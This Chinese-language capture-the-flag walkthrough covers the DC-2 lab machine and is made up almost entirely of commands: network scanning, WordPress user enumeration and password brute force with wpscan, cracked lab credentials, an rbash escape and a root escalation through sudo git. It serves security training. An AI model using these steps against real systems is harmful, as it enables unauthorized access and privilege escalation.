前言
开启征程——DC2
老样子,先内网扫描一波
代码语言:javascript复制arp-scan -l
接着nmap扫一下他的端口
代码语言:javascript复制nmap -p1-65535 -A -sV 192.168.232.142ssh默认端口不是22?竟给改成了7744
打开网页发现会打不开,这时就需要设置hosts文件才能访问
代码语言:javascript复制vi /etc/hosts
#输入i进行修改
192.168.232.142 dc-2
#保存返回 输入:x
cat /etc/hosts
此时访问 http://dc-2 即可,打开发现是wp的
发现flag1
根据提示需要cewl,生成密码
代码语言:javascript复制cewl -w passwords.txt http://dc-2
cat passwords.txt接着我们使用专门扫wp的wpscan扫描用户
代码语言:javascript复制wpscan --url http://dc-2 --enumerate u
最后成功得到三个用户名:admin、tom、jerry,并创建user.txt将其放入
然后我们就可以根据所得user和passwords的字典用wpscan进行爆破
代码语言:javascript复制wpscan --ignore-main-redirect --url 192.168.232.142 -U user.txt -P passwords.txt --force
最后我们成功爆破出了账号密码
代码语言:javascript复制[SUCCESS] - jerry / adipiscing [SUCCESS] - tom / parturient到这里,我们便可以ssh连进去了
代码语言:javascript复制ssh tom@192.168.232.142 -p 7744
parturient
进去后发现shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功cat到flag3
代码语言:javascript复制whoami
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
ls
cat flag3.txt
根据提示我们再切换成用户jerry的,在jerry用户下得到flag4
代码语言:javascript复制su jerry
adipiscing
cd /home/jerry
ls
cat flag4.txt
Go on - git outta here!!!! 我们接着git提权
代码语言:javascript复制sudo git -p help config
!/bin/bash
whoami
ls /root
cat /root/final-flag.txt
